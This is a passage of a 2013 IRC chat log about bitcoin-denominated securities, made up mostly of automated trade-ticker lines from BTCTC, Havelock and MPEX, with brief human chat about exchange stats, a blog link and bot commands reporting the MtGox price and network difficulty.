03:40:22 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.003134 = 0.0094 BTC [-] Jul 29 03:40:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003133 BTC [-] Jul 29 03:40:28 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.003131 = 0.0157 BTC [-] Jul 29 03:40:29 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003124 BTC [-] Jul 29 03:40:37 [BTCTC] [ACTIVEMINING] 25 @ 0.008497 = 0.2124 BTC [+] Jul 29 03:40:40 [BTCTC] [ACTIVEMINING] 50 @ 0.008498 = 0.4249 BTC [+] Jul 29 03:40:42 [BTCTC] [DMS.MINING] 1 @ 0.0115 BTC [-] Jul 29 03:40:46 [BTCTC] [ACTIVEMINING] 75 @ 0.0085 = 0.6375 BTC [+] Jul 29 03:40:48 [BTCTC] [ACTIVEMINING] 225 @ 0.0085 = 1.9125 BTC [+] Jul 29 03:41:08 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.003123 = 1.5615 BTC [-] Jul 29 03:41:28 [BTCTC] [DMS.MINING] 5 @ 0.01142 = 0.0571 BTC [-] Jul 29 03:41:44 [BTCTC] [TAT.VIRTUALMINE] 80 @ 0.003122 = 0.2498 BTC [-] Jul 29 03:41:46 [BTCTC] [TAT.VIRTUALMINE] 182 @ 0.00312 = 0.5678 BTC [-] Jul 29 03:42:00 [BTCTC] [COGNITIVE] 4 @ 0.561 = 2.244 BTC [-] Jul 29 03:42:01 [BTCTC] [COGNITIVE] 20 @ 0.5601 = 11.202 BTC [-] Jul 29 03:43:02 [BTCTC] [ACTIVEMINING] 1 @ 0.008499 BTC [-] Jul 29 03:44:38 [BTCTC] [DMS.PURCHASE] 1 @ 0.03365 BTC [-] Jul 29 03:46:18 [BTCTC] [COGNITIVE] 3 @ 0.56 = 1.68 BTC [-] Jul 29 03:46:19 [BTCTC] [DMS.SELLING] 1 @ 0.02148 BTC [+] Jul 29 03:46:23 [BTCTC] [COGNITIVE] 5 @ 0.552 = 2.76 BTC [-] Jul 29 03:46:27 [BTCTC] [COGNITIVE] 1 @ 0.5501 BTC [-] Jul 29 03:46:29 [BTCTC] [COGNITIVE] 23 @ 0.55 = 12.65 BTC [-] Jul 29 03:47:38 [BTCTC] [TAT.ASICMINER] 19 @ 0.04306 = 0.8181 BTC [-] Jul 29 03:47:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.04305 = 2.1525 BTC [-] Jul 29 03:47:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.04304 = 0.6456 BTC [-] Jul 29 03:47:43 [BTCTC] [TAT.ASICMINER] 40 @ 0.043 = 1.72 BTC [-] Jul 29 03:47:45 [BTCTC] [TAT.ASICMINER] 2 @ 0.043 = 0.086 BTC [-] Jul 29 03:47:48 [BTCTC] [TAT.ASICMINER] 33 @ 0.043 = 1.419 BTC [-] Jul 29 03:48:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.0426 = 0.0852 BTC [-] Jul 29 03:48:43 [BTCTC] [TAT.ASICMINER] 17 @ 0.0425 = 0.7225 BTC [-] Jul 29 03:48:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.0425 = 0.425 BTC [-] Jul 29 03:49:45 [BTCTC] [ACTIVEMINING] 45 @ 0.008499 = 0.3825 BTC [-] Jul 29 03:49:47 [BTCTC] [ACTIVEMINING] 1 @ 0.008499 BTC [-] Jul 29 03:50:30 [BTCTC] [ACTIVEMINING] 76 @ 0.008499 = 0.6459 BTC [-] Jul 29 03:51:01 [BTCTC] [TAT.ASICMINER] 40 @ 0.0425 = 1.7 BTC [-] Jul 29 03:51:05 [BTCTC] [TAT.ASICMINER] 46 @ 0.0422 = 1.9412 BTC [-] Jul 29 03:51:10 [BTCTC] [ACTIVEMINING] 500 @ 0.008499 = 4.2495 BTC [-] Jul 29 03:51:36 [BTCTC] [ACTIVEMINING] 275 @ 0.0085 = 2.3375 BTC [+] Jul 29 03:51:37 [BTCTC] [ACTIVEMINING] 83 @ 0.008599 = 0.7137 BTC [+] Jul 29 03:51:38 [BTCTC] [ACTIVEMINING] 500 @ 0.0086 = 4.3 BTC [+] Jul 29 03:51:53 [BTCTC] [ACTIVEMINING] 142 @ 0.0086 = 1.2212 BTC [+] Jul 29 03:51:55 [BTCTC] [ACTIVEMINING] 493 @ 0.008499 = 4.19 BTC [-] Jul 29 03:52:07 [MPEX] [S.MPOE] 13950 @ 0.00079781 = 11.1294 BTC [-] Jul 29 03:53:39 [BTCTC] [ACTIVEMINING] 1 @ 0.008888 BTC [+] Jul 29 03:53:40 [BTCTC] [ACTIVEMINING] 10 @ 0.008889 = 0.0889 BTC [+] Jul 29 03:54:45 [BTCTC] [ACTIVEMINING] 75 @ 0.009 = 0.675 BTC [+] Jul 29 03:54:59 [BTCTC] [ACTIVEMINING] 25 @ 0.008505 = 0.2126 BTC [-] Jul 29 03:55:35 [BTCTC] [ACTIVEMINING] 25 @ 0.008601 = 0.215 BTC [+] Jul 29 03:55:37 [BTCTC] [ACTIVEMINING] 2 @ 0.0086 = 0.0172 BTC [-] Jul 29 03:55:39 [BTCTC] [ACTIVEMINING] 50 @ 0.008505 = 0.4253 BTC [-] Jul 29 03:55:41 [BTCTC] [ACTIVEMINING] 1 @ 0.008504 BTC [-] Jul 29 03:55:42 [BTCTC] [ACTIVEMINING] 130 @ 0.008502 = 1.1053 BTC [-] Jul 29 03:55:44 [BTCTC] [ACTIVEMINING] 10508 @ 0.008499 = 89.3075 BTC [-] Jul 29 03:55:51 [HAVELOCK] [AM100] 50 @ 0.0429997 = 2.15 BTC [+] Jul 29 03:55:54 [BTCTC] [ACTIVEMINING] 25 @ 0.008999 = 0.225 BTC [+] Jul 29 03:55:55 [BTCTC] [ACTIVEMINING] 6 @ 0.009 = 0.054 BTC [+] Jul 29 03:55:58 [HAVELOCK] [AM100] 1 @ 0.0429997 BTC [+] Jul 29 03:56:24 [BTCTC] [BASIC-MINING] 1 @ 0.5104 BTC [-] Jul 29 03:56:26 [BTCTC] [BASIC-MINING] 1 @ 0.5103 BTC [-] Jul 29 03:56:33 [HAVELOCK] [AM100] 8 @ 0.0429997 = 0.344 BTC [+] Jul 29 03:56:49 oww, i won't ever get the mpex matching 100% done... found another bug :( Jul 29 03:56:50 [HAVELOCK] [AM100] 2 @ 0.0429997 = 0.086 BTC [+] Jul 29 03:57:07 [HAVELOCK] [AM100] 2 @ 0.0429997 = 0.086 BTC [+] Jul 29 03:57:39 at least mircea_popescu could mind to finally kill the s.dice zombie to have one warning less Jul 29 03:58:35 [BTCTC] [ACTIVEMINING] 25 @ 0.0085 = 0.2125 BTC [-] Jul 29 03:58:36 [BTCTC] [ACTIVEMINING] 17 @ 0.008499 = 0.1445 BTC [-] Jul 29 03:59:08 i'm still seeing s.dice in statjson output Jul 29 03:59:44 jurov you will for about a month. Jul 29 03:59:51 it's for people who want to take a final stat for their records. Jul 29 04:01:16 you'll get some fool gawker bloggers that run stat once a half year anyway Jul 29 04:01:43 but i understand, just ranting Jul 29 04:01:54 [BTCTC] [ACTIVEMINING] 25 @ 0.008882 = 0.2221 BTC [+] Jul 29 04:01:56 [BTCTC] [ACTIVEMINING] 12 @ 0.008883 = 0.1066 BTC [+] Jul 29 04:01:58 [BTCTC] [ACTIVEMINING] 50 @ 0.008885 = 0.4443 BTC [+] Jul 29 04:02:00 [BTCTC] [ACTIVEMINING] 1 @ 0.008887 BTC [+] Jul 29 04:02:39 [BTCTC] [ACTIVEMINING] 25 @ 0.008799 = 0.22 BTC [-] Jul 29 04:02:42 [BTCTC] [ACTIVEMINING] 13 @ 0.0088 = 0.1144 BTC [+] Jul 29 04:02:45 [BTCTC] [ACTIVEMINING] 1 @ 0.0088 BTC [+] Jul 29 04:02:49 [BTCTC] [ACTIVEMINING] 25 @ 0.008799 = 0.22 BTC [-] Jul 29 04:02:51 [BTCTC] [ACTIVEMINING] 1 @ 0.008699 BTC [-] Jul 29 04:03:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.0439 = 0.0878 BTC [+] Jul 29 04:04:18 [BTCTC] [TAT.ASICMINER] 4 @ 0.0439 = 0.1756 BTC [+] Jul 29 04:04:19 :p Jul 29 04:04:26 gotta struggle for teh middle road. Jul 29 04:05:55 [BTCTC] [LTC-ATF.B2] 1 @ 0.01031 BTC [+] Jul 29 04:07:07 [BTCTC] [S.MPOE-PT] 20 @ 0.0009457 = 0.0189 BTC [+] Jul 29 04:07:41 ;;ticker Jul 29 04:07:41 MtGox BTCUSD ticker | Best bid: 100.00000, Best ask: 100.00499, Bid-ask spread: 0.00499, Last trade: 100.00499, 24 hour volume: 42960.21961583, 24 hour low: 94.00000, 24 hour high: 100.76242, 24 hour vwap: 98.51657 Jul 29 04:07:56 boiler room valves are slowly closing Jul 29 04:09:00 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 29 04:13:05 [BTCTC] [ACTIVEMINING] 60 @ 0.008499 = 0.5099 BTC [-] Jul 29 04:13:07 [BTCTC] [ACTIVEMINING] 940 @ 0.008 = 7.52 BTC [-] Jul 29 04:13:50 [BTCTC] [ACTIVEMINING] 64 @ 0.008503 = 0.5442 BTC [+] Jul 29 04:14:54 [BTCTC] [ACTIVEMINING] 48 @ 0.008504 = 0.4082 BTC [+] Jul 29 04:15:15 [BTCTC] [ACTIVEMINING] 25 @ 0.008003 = 0.2001 BTC [-] Jul 29 04:15:17 [BTCTC] [ACTIVEMINING] 50 @ 0.008002 = 0.4001 BTC [-] Jul 29 04:15:20 [BTCTC] [ACTIVEMINING] 50 @ 0.008001 = 0.4001 BTC [-] Jul 29 04:15:22 [BTCTC] [ACTIVEMINING] 210 @ 0.008 = 1.68 BTC [-] Jul 29 04:15:25 [BTCTC] [ACTIVEMINING] 300 @ 0.008 = 2.4 BTC [-] Jul 29 04:15:55 [BTCTC] [TAT.MINIGAME] 1894 @ 0.0002949 = 0.5585 BTC [-] Jul 29 04:18:49 [HAVELOCK] [AM100] 1 @ 0.0429959 BTC [-] Jul 29 04:22:52 [HAVELOCK] [AM100] 3 @ 0.0429959 = 0.129 BTC [-] Jul 29 04:23:10 http://trilema.com/2013/bitcoins-eve-corporation/ Jul 29 04:23:17 Bitcoin’s EVE corporation pe Trilema - Un blog de Mircea Popescu. Jul 29 04:23:17 someone put that on reddit please Jul 29 04:24:52 [HAVELOCK] [SDSTM] 5 @ 0.008 = 0.04 BTC [-] Jul 29 04:25:26 [BTCTC] [ACTIVEMINING] 85 @ 0.007999 = 0.6799 BTC [-] Jul 29 04:25:28 [BTCTC] [ACTIVEMINING] 430 @ 0.008 = 3.44 BTC [+] Jul 29 04:25:52 [BTCTC] [ACTIVEMINING] 85 @ 0.008 = 0.68 BTC [+] Jul 29 04:26:22 [BTCTC] [ACTIVEMINING] 25 @ 0.008502 = 0.2126 BTC [+] Jul 29 04:26:24 [BTCTC] [ACTIVEMINING] 34 @ 0.008503 = 0.2891 BTC [+] Jul 29 04:26:25 [BTCTC] [ACTIVEMINING] 208 @ 0.008504 = 1.7688 BTC [+] Jul 29 04:26:53 [HAVELOCK] [AM100] 60 @ 0.0429959 = 2.5798 BTC [-] Jul 29 04:27:02 [BTCTC] [ACTIVEMINING] 165 @ 0.008799 = 1.4518 BTC [+] Jul 29 04:30:20 [BTCTC] [ACTIVEMINING] 38 @ 0.008779 = 0.3336 BTC [-] Jul 29 04:30:21 [BTCTC] [ACTIVEMINING] 233 @ 0.00878 = 2.0457 BTC [+] Jul 29 04:30:25 [BTCTC] [ACTIVEMINING] 68 @ 0.008797 = 0.5982 BTC [+] Jul 29 04:30:30 [BTCTC] [ACTIVEMINING] 50 @ 0.008798 = 0.4399 BTC [+] Jul 29 04:31:37 [BTCTC] [ACTIVEMINING] 120 @ 0.008799 = 1.0559 BTC [+] Jul 29 04:31:51 [BTCTC] [ACTIVEMINING] 3 @ 0.008779 = 0.0263 BTC [-] Jul 29 04:32:22 [BTCTC] [TAT.ASICMINER] 3 @ 0.04222 = 0.1267 BTC [-] Jul 29 04:32:26 [BTCTC] [ACTIVEMINING] 47 @ 0.008779 = 0.4126 BTC [-] Jul 29 04:32:30 [BTCTC] [RSM] 1 @ 0.0154 BTC [+] Jul 29 04:33:20 [BTCTC] [LTC-ATF.B2] 5 @ 0.01031 = 0.0516 BTC [+] Jul 29 04:33:32 [BTCTC] [ACTIVEMINING] 180 @ 0.008799 = 1.5838 BTC [+] Jul 29 04:34:32 [HAVELOCK] [AM100] 3 @ 0.0429 = 0.1287 BTC [-] Jul 29 04:34:36 [BTCTC] [RSM] 22 @ 0.0154 = 0.3388 BTC [+] Jul 29 04:34:38 [BTCTC] [RSM] 5 @ 0.0155 = 0.0775 BTC [+] Jul 29 04:34:39 [BTCTC] [RSM] 30 @ 0.0155 = 0.465 BTC [+] Jul 29 04:36:27 [BTCTC] [ACTIVEMINING] 16 @ 0.008799 = 0.1408 BTC [+] Jul 29 04:37:33 [BTCTC] [ACTIVEMINING] 80 @ 0.008799 = 0.7039 BTC [+] Jul 29 04:39:32 [BTCTC] [ACTIVEMINING] 120 @ 0.008799 = 1.0559 BTC [+] Jul 29 04:45:57 [BTCTC] [ACTIVEMINING] 40 @ 0.008798 = 0.3519 BTC [-] Jul 29 04:45:59 [BTCTC] [ACTIVEMINING] 1296 @ 0.0088 = 11.4048 BTC [+] Jul 29 04:46:00 [BTCTC] [ACTIVEMINING] 100 @ 0.0088 = 0.88 BTC [+] Jul 29 04:46:02 [BTCTC] [ACTIVEMINING] 64 @ 0.0089 = 0.5696 BTC [+] Jul 29 04:48:51 [BTCTC] [ACTIVEMINING] 500 @ 0.00889 = 4.445 BTC [-] Jul 29 04:48:53 [BTCTC] [ACTIVEMINING] 136 @ 0.0089 = 1.2104 BTC [+] Jul 29 04:48:55 [BTCTC] [ACTIVEMINING] 873 @ 0.0089 = 7.7697 BTC [+] Jul 29 04:49:04 [BTCTC] [BASIC-MINING] 2 @ 0.5103 = 1.0206 BTC [-] Jul 29 04:49:06 [BTCTC] [BASIC-MINING] 3 @ 0.5102 = 1.5306 BTC [-] Jul 29 04:49:19 [BTCTC] [BASIC-MINING] 2 @ 0.51 = 1.02 BTC [-] Jul 29 04:49:21 [BTCTC] [BASIC-MINING] 3 @ 0.5077 = 1.5231 BTC [-] Jul 29 04:50:35 [BTCTC] [ACTIVEMINING] 500 @ 0.009 = 4.5 BTC [+] Jul 29 04:51:02 [BTCTC] [ACTIVEMINING] 25 @ 0.0089 = 0.2225 BTC [-] Jul 29 04:51:18 [BTCTC] [ACTIVEMINING] 639 @ 0.009001 = 5.7516 BTC [+] Jul 29 04:52:52 [BTCTC] [ASICMINER-PT] 1 @ 4.494 BTC [+] Jul 29 04:52:54 [BTCTC] [ASICMINER-PT] 1 @ 4.494 BTC [+] Jul 29 04:52:56 [BTCTC] [ASICMINER-PT] 3 @ 4.495 = 13.485 BTC [+] Jul 29 04:53:31 [BTCTC] [ACTIVEMINING] 544 @ 0.009099 = 4.9499 BTC [+] Jul 29 04:56:40 [BTCTC] [ACTIVEMINING] 238 @ 0.00905 = 2.1539 BTC [-] Jul 29 04:56:55 [BTCTC] [ACTIVEMINING] 32 @ 0.009099 = 0.2912 BTC [+] Jul 29 04:56:56 [BTCTC] [ACTIVEMINING] 26 @ 0.009099 = 0.2366 BTC [+] Jul 29 04:58:17 [BTCTC] [ASICMINER-PT] 1 @ 4.333 BTC [-] Jul 29 04:58:20 [BTCTC] [ASICMINER-PT] 1 @ 4.332 BTC [-] Jul 29 04:58:22 [BTCTC] [ASICMINER-PT] 1 @ 4.332 BTC [-] Jul 29 04:58:24 [BTCTC] [ASICMINER-PT] 1 @ 4.33 BTC [-] Jul 29 04:58:26 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 04:58:40 [BTCTC] [ACTIVEMINING] 57 @ 0.0091 = 0.5187 BTC [+] Jul 29 04:58:48 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 05:02:37 [HAVELOCK] [SDSTM] 1 @ 0.008055 BTC [+] Jul 29 05:02:54 [BTCTC] [ACTIVEMINING] 50 @ 0.009 = 0.45 BTC [-] Jul 29 05:03:49 [BTCTC] [ACTIVEMINING] 25 @ 0.008905 = 0.2226 BTC [-] Jul 29 05:04:23 [BTCTC] [ACTIVEMINING] 38 @ 0.008905 = 0.3384 BTC [-] Jul 29 05:04:24 [BTCTC] [ACTIVEMINING] 50 @ 0.008905 = 0.4453 BTC [-] Jul 29 05:07:46 [BTCTC] [ACTIVEMINING] 11 @ 0.0091 = 0.1001 BTC [+] Jul 29 05:08:00 [BTCTC] [ACTIVEMINING] 100 @ 0.0089 = 0.89 BTC [-] Jul 29 05:08:14 [BTCTC] [ACTIVEMINING] 25 @ 0.008901 = 0.2225 BTC [+] Jul 29 05:08:29 [BTCTC] [ACTIVEMINING] 75 @ 0.0089 = 0.6675 BTC [-] Jul 29 05:08:31 [BTCTC] [ACTIVEMINING] 25 @ 0.008999 = 0.225 BTC [+] Jul 29 05:08:33 [BTCTC] [ACTIVEMINING] 900 @ 0.009 = 8.1 BTC [+] Jul 29 05:08:48 [MPEX] [S.MPOE] 41700 @ 0.00079904 = 33.32 BTC [+] Jul 29 05:12:57 [BTCTC] [ACTIVEMINING] 25 @ 0.0089 = 0.2225 BTC [-] Jul 29 05:13:21 [BTCTC] [ACTIVEMINING] 50 @ 0.008998 = 0.4499 BTC [+] Jul 29 05:14:14 [BTCTC] [ACTIVEMINING] 4 @ 0.008899 = 0.0356 BTC [-] Jul 29 05:14:16 [BTCTC] [ACTIVEMINING] 21 @ 0.008997 = 0.1889 BTC [+] Jul 29 05:14:40 [BTCTC] [ACTIVEMINING] 4 @ 0.008997 = 0.036 BTC [+] Jul 29 05:15:17 [BTCTC] [ACTIVEMINING] 40 @ 0.009 = 0.36 BTC [+] Jul 29 05:15:35 [HAVELOCK] [SDSTM] 5 @ 0.0082 = 0.041 BTC [+] Jul 29 05:15:39 [BTCTC] [ACTIVEMINING] 20 @ 0.009 = 0.18 BTC [+] Jul 29 05:15:42 [HAVELOCK] [SDSTM] 5 @ 0.0084 = 0.042 BTC [+] Jul 29 05:15:49 [HAVELOCK] [SDSTM] 5 @ 0.0086 = 0.043 BTC [+] Jul 29 05:15:52 [BTCTC] [ACTIVEMINING] 40 @ 0.009 = 0.36 BTC [+] Jul 29 05:15:55 [HAVELOCK] [SDSTM] 5 @ 0.0088 = 0.044 BTC [+] Jul 29 05:16:07 [HAVELOCK] [SDSTM] 5 @ 0.009 = 0.045 BTC [+] Jul 29 05:18:31 [HAVELOCK] [SMG] 7 @ 0.00025611 = 0.0018 BTC [-] Jul 29 05:21:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.04231 = 0.3808 BTC [+] Jul 29 05:23:11 [BTCTC] [ACTIVEMINING] 34 @ 0.009089 = 0.309 BTC [+] Jul 29 05:23:12 [BTCTC] [ACTIVEMINING] 500 @ 0.00909 = 4.545 BTC [+] Jul 29 05:23:14 [BTCTC] [ACTIVEMINING] 75 @ 0.009098 = 0.6824 BTC [+] Jul 29 05:23:15 [BTCTC] [ACTIVEMINING] 432 @ 0.0091 = 3.9312 BTC [+] Jul 29 05:23:17 [BTCTC] [ACTIVEMINING] 808 @ 0.0091 = 7.3528 BTC [+] Jul 29 05:23:31 [HAVELOCK] [SMG] 800 @ 0.0002561 = 0.2049 BTC [-] Jul 29 05:23:48 [HAVELOCK] [SMG] 1055 @ 0.0002555 = 0.2696 BTC [-] Jul 29 05:24:37 [HAVELOCK] [SMG] 80 @ 0.000255 = 0.0204 BTC [-] Jul 29 05:26:02 [BTCTC] [ACTIVEMINING] 1 @ 0.009 BTC [-] Jul 29 05:27:10 [BTCTC] [ACTIVEMINING] 600 @ 0.009 = 5.4 BTC [-] Jul 29 05:27:25 [HAVELOCK] [SMG] 1600 @ 0.000255 = 0.408 BTC [-] Jul 29 05:31:28 [BTCTC] [ACTIVEMINING] 15 @ 0.009 = 0.135 BTC [-] Jul 29 05:34:10 [HAVELOCK] [AM100] 7 @ 0.04283 = 0.2998 BTC [-] Jul 29 05:34:12 [HAVELOCK] [AM100] 100 @ 0.04282 = 4.282 BTC [-] Jul 29 05:34:14 [HAVELOCK] [AM100] 699 @ 0.04281 = 29.9242 BTC [-] Jul 29 05:34:26 [MPEX] [S.MPOE] 4307 @ 0.00080475 = 3.4661 BTC [+] Jul 29 05:34:28 [MPEX] [S.MPOE] 2452 @ 0.00080522 = 1.9744 BTC [+] Jul 29 05:34:40 [BTCTC] [ACTIVEMINING] 554 @ 0.009 = 4.986 BTC [-] Jul 29 05:39:27 [BTCTC] [ACTIVEMINING] 200 @ 0.009 = 1.8 BTC [-] Jul 29 05:39:43 [BTCTC] [ACTIVEMINING] 50 @ 0.008876 = 0.4438 BTC [-] Jul 29 05:39:46 [BTCTC] [ACTIVEMINING] 25 @ 0.008875 = 0.2219 BTC [-] Jul 29 05:39:48 [BTCTC] [ACTIVEMINING] 1 @ 0.008874 BTC [-] Jul 29 05:39:50 [BTCTC] [ACTIVEMINING] 19 @ 0.008866 = 0.1685 BTC [-] Jul 29 05:39:52 [BTCTC] [ACTIVEMINING] 114 @ 0.008652 = 0.9863 BTC [-] Jul 29 05:39:53 [BTCTC] [ACTIVEMINING] 91 @ 0.00865 = 0.7872 BTC [-] Jul 29 05:40:14 [HAVELOCK] [SDSTM] 1 @ 0.0092 BTC [+] Jul 29 05:41:10 [BTCTC] [TAT.VIRTUALMINE] 68 @ 0.00312 = 0.2122 BTC [-] Jul 29 05:42:12 [BTCTC] [ACTIVEMINING] 15 @ 0.008996 = 0.1349 BTC [+] Jul 29 05:42:28 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.003119 = 0.0686 BTC [-] Jul 29 05:42:31 [BTCTC] [TAT.MINIGAME] 24 @ 0.0002948 = 0.0071 BTC [-] Jul 29 05:43:44 [HAVELOCK] [SDSTM] 3 @ 0.0081 = 0.0243 BTC [-] Jul 29 05:43:47 [HAVELOCK] [SDSTM] 100 @ 0.00802001 = 0.802 BTC [-] Jul 29 05:43:49 [HAVELOCK] [SDSTM] 10 @ 0.00802 = 0.0802 BTC [-] Jul 29 05:43:51 [HAVELOCK] [SDSTM] 249 @ 0.00801 = 1.9945 BTC [-] Jul 29 05:44:22 [BTCTC] [ACTIVEMINING] 50 @ 0.008996 = 0.4498 BTC [+] Jul 29 05:44:22 [BTCTC] [ACTIVEMINING] 70 @ 0.008997 = 0.6298 BTC [+] Jul 29 05:46:50 [BTCTC] [ACTIVEMINING] 98 @ 0.00899 = 0.881 BTC [-] Jul 29 05:47:56 [BTCTC] [ACTIVEMINING] 2200 @ 0.008989 = 19.7758 BTC [-] Jul 29 05:48:06 [MPEX] [S.MPOE] 4937 @ 0.00080522 = 3.9754 BTC [+] Jul 29 05:48:08 [MPEX] [S.MPOE] 1950 @ 0.00080527 = 1.5703 BTC [+] Jul 29 05:48:14 [MPEX] [S.MPOE] 11000 @ 0.00080611 = 8.8672 BTC [+] Jul 29 05:48:18 [BTCTC] [TAT.ASICMINER] 12 @ 0.04231 = 0.5077 BTC [+] Jul 29 05:54:24 [BTCTC] [TAT.MINIGAME] 976 @ 0.0002948 = 0.2877 BTC [-] Jul 29 05:57:27 [BTCTC] [ACTIVEMINING] 1 @ 0.008988 BTC [-] Jul 29 05:57:40 [BTCTC] [ACTIVEMINING] 63 @ 0.008988 = 0.5662 BTC [-] Jul 29 05:57:42 [BTCTC] [ACTIVEMINING] 118 @ 0.008989 = 1.0607 BTC [+] Jul 29 05:57:43 [BTCTC] [ACTIVEMINING] 402 @ 0.00899 = 3.614 BTC [+] Jul 29 05:57:45 [BTCTC] [ACTIVEMINING] 579 @ 0.009 = 5.211 BTC [+] Jul 29 05:58:16 [BTCTC] [BASIC-MINING] 2 @ 0.5076 = 1.0152 BTC [-] Jul 29 05:58:33 [BTCTC] [ACTIVEMINING] 2 @ 0.009 = 0.018 BTC [+] Jul 29 05:58:51 [HAVELOCK] [SDSTM] 79 @ 0.00801 = 0.6328 BTC [-] Jul 29 05:59:00 [BTCTC] [TAT.ASICMINER] 16 @ 0.04369 = 0.699 BTC [+] Jul 29 05:59:48 [BTCTC] [TAT.ASICMINER] 7 @ 0.0437 = 0.3059 BTC [+] Jul 29 06:01:56 [HAVELOCK] [AM100] 14 @ 0.0429499 = 0.6013 BTC [+] Jul 29 06:02:29 [BTCTC] [ACTIVEMINING] 1 @ 0.008999 BTC [-] Jul 29 06:07:03 [BTCTC] [ACTIVEMINING] 150 @ 0.008999 = 1.3499 BTC [-] Jul 29 06:07:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.04351 = 0.087 BTC [-] Jul 29 06:07:11 [BTCTC] [TAT.ASICMINER] 14 @ 0.0435 = 0.609 BTC [-] Jul 29 06:08:46 [BTCTC] [BASIC-MINING] 2 @ 0.62 = 1.24 BTC [+] Jul 29 06:08:47 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [-] Jul 29 06:08:49 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [-] Jul 29 06:08:51 [BTCTC] [ASICMINER-PT] 1 @ 4.227 BTC [-] Jul 29 06:08:54 [BTCTC] [ASICMINER-PT] 1 @ 4.223 BTC [-] Jul 29 06:08:56 [BTCTC] [ASICMINER-PT] 1 @ 4.223 BTC [-] Jul 29 06:09:00 [MPEX] [S.MPOE] 6400 @ 0.00081716 = 5.2298 BTC [+] Jul 29 06:09:03 [BTCTC] [ACTIVEMINING] 368 @ 0.008999 = 3.3116 BTC [-] Jul 29 06:09:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00325 BTC [+] Jul 29 06:09:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0033 BTC [+] Jul 29 06:09:29 [BTCTC] [TAT.VIRTUALMINE] 188 @ 0.003348 = 0.6294 BTC [+] Jul 29 06:11:00 [BTCTC] [ACTIVEMINING] 2300 @ 0.009 = 20.7 BTC [+] Jul 29 06:11:36 [BTCTC] [ACTIVEMINING] 607 @ 0.008999 = 5.4624 BTC [-] Jul 29 06:12:08 [HAVELOCK] [AM100] 12 @ 0.0429499 = 0.5154 BTC [+] Jul 29 06:12:13 [BTCTC] [TAT.VIRTUALMINE] 12 @ 0.003348 = 0.0402 BTC [+] Jul 29 06:12:15 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00335 = 0.0134 BTC [+] Jul 29 06:12:59 o looky http://www.reddit.com/r/Bitcoin/comments/1j8y1s/the_premiere_bitcoin_eve_corporation/ Jul 29 06:13:01 thanks thestringpuller Jul 29 06:13:20 [BTCTC] [ACTIVEMINING] 180 @ 0.008899 = 1.6018 BTC [-] Jul 29 06:13:22 [BTCTC] [TAT.ASICMINER] 41 @ 0.0435 = 1.7835 BTC [-] Jul 29 06:13:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00335 BTC [+] Jul 29 06:14:22 ;;nethash Jul 29 06:14:23 267144.359074 Jul 29 06:14:29 ;;estimate Jul 29 06:14:29 Next difficulty estimate | 34397491.3665 based on data since last change | 37319066.3905 based on data for last three days Jul 29 06:14:35 ''bcstats Jul 29 06:14:42 ;;bcstats Jul 29 06:14:44 Current Blocks: 248979 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 1004 blocks | Next Difficulty In About: 6 days, 5 hours, 39 minutes, and 52 seconds | Next Difficulty Estimate: 34397491.3665 | Estimated Percent Change: 10.04746 Jul 29 06:15:29 [BTCTC] [ACTIVEMINING] 15 @ 0.008899 = 0.1335 BTC [-] Jul 29 06:15:45 [BTCTC] [CRYPTO-TRADE] 27 @ 0.2 = 5.4 BTC [+] Jul 29 06:15:46 [BTCTC] [ACTIVEMINING] 76 @ 0.008899 = 0.6763 BTC [-] Jul 29 06:15:49 [BTCTC] [CRYPTO-TRADE] 35 @ 0.2 = 7 BTC [+] Jul 29 06:16:07 ;;ticker Jul 29 06:16:07 MtGox BTCUSD ticker | Best bid: 98.60000, Best ask: 98.80005, Bid-ask spread: 0.20005, Last trade: 98.60000, 24 hour volume: 45498.42516112, 24 hour low: 94.00000, 24 hour high: 100.76242, 24 hour vwap: 98.63446 Jul 29 06:19:22 [BTCTC] [ACTIVEMINING] 1 @ 0.00881 BTC [-] Jul 29 06:20:27 [BTCTC] [ACTIVEMINING] 4 @ 0.008805 = 0.0352 BTC [-] Jul 29 06:20:40 ThickAsThieves: you still around? Jul 29 06:20:42 [BTCTC] [ACTIVEMINING] 100 @ 0.008899 = 0.8899 BTC [+] Jul 29 06:24:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.043 = 0.344 BTC [-] Jul 29 06:24:49 [BTCTC] [TAT.ASICMINER] 9 @ 0.043 = 0.387 BTC [-] Jul 29 06:26:07 [BTCTC] [ACTIVEMINING] 1 @ 0.008888 BTC [-] Jul 29 06:28:33 [BTCTC] [ACTIVEMINING] 9 @ 0.008804 = 0.0792 BTC [-] Jul 29 06:28:35 [BTCTC] [ACTIVEMINING] 194 @ 0.008701 = 1.688 BTC [-] Jul 29 06:28:37 [BTCTC] [ACTIVEMINING] 147 @ 0.0087 = 1.2789 BTC [-] Jul 29 06:29:23 [HAVELOCK] [HIM] 1 @ 0.2 BTC [+] Jul 29 06:29:26 [BTCTC] [ACTIVEMINING] 25 @ 0.008701 = 0.2175 BTC [+] Jul 29 06:29:27 [BTCTC] [ACTIVEMINING] 475 @ 0.0087 = 4.1325 BTC [-] Jul 29 06:32:27 [BTCTC] [ACTIVEMINING] 57 @ 0.0088 = 0.5016 BTC [+] Jul 29 06:33:43 [BTCTC] [ACTIVEMINING] 2119 @ 0.0088 = 18.6472 